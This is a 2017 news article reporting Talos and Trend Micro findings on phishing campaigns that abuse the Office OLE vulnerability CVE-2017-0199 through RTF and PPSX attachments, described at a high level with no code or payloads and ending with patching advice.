Attackers experimenting with CVE-2017-0199 in recent phishing attacks
- 16 August, 2017 09:55
Researchers at Trend Micro and Cisco's Talos have identified a new wave of phishing attacks leveraging CVE-2017-0199, a previously patched remote code execution vulnerability in the OLE (Windows Object Linking and Embedding) interface of Microsoft Office.
These latest attacks have paired the vulnerability with others in an attempt to bypass warning messages, but the results were less than stellar.
In a blog post, Talos researchers said the attacks they've observed used CVE-2017-0199 with an older exploit – CVE-2012-0158 – in an attempt to bypass warning messages displayed by Microsoft Word. However, they believe the attacks were a test-run of sorts, because the attackers made several mistakes that limited its overall effectiveness.
"Analysis of the payload highlights the potential for the Ole2Link exploit to launch other document types, and also demonstrates a lack of rigorous testing procedures by at least one threat actor. Attackers are obviously trying to find a way around known warning mechanisms alerting users about potential security issues with opened documents," the Talos post explained.
The attacks start via email with an attached malicious RTF document. Due to the vulnerability in the process that handles OLE2Link code, the RTF document will trigger a remote download via Word, eventually resulting in malware on the system.
But the attackers failed to test their code, as the two vulnerabilities they attempted to chain together didn't work. The warning prompts within Word were still displayed as expected. But why attempt to use two vulnerabilities at all? If the system was vulnerable to CVE-2012-0158, that would make things simpler for the attacker.
"An assumption we can make is that that the attackers used the combination to avoid Word displaying the prompt which may raise suspicions for the target end user. Another possibility is that they attempted to use this combination in order to avoid behavioral detection systems which may be triggering on the combination of Ole2Link in a word document and a download of an HTA file," the post says.
A full technical review is available on the Talos blog.
The same day that Talos published its findings, researchers at Trend Micro did the same. Only, in their case, the attackers were using PPSX attachments, or PowerPoint Slideshow – proving the Talos observation that attackers would eventually start testing additional Office formats.
The PPSX discovered by Trend researchers leveraged CVE-2017-0199. However, the email itself appeared to target companies involved in electronics manufacturing. The researchers who investigated the message believe that the 'From' field was spoofed to mimic a legitimate email from a known business partner, but the findings aren't conclusive.
When the victim opens the PPSX file, instead of the promised business documents, the screen will display a page with nothing other than 'CVE-2017-8570' written on it, which is an entirely different Microsoft Office vulnerability. This random display led Trend researchers to speculate that this is a leftover mistake from the toolkit developer, one the attackers never bothered to address.
"Ultimately, the use of a new method of attack is a practical consideration; since most detection methods for CVE-2017-0199 focuses on the RTF method of attack, the use of a new vector—PPSX files—allows attackers to evade antivirus detection," the Trend blog explains.
Users who patched their systems with April's updates would be protected from these recent attacks. However, users would be cautious when opening files or following links, even if they come from a source that looks legitimate on the surface.
A full technical analysis of the PPSX attacks are on the Trend Micro blog.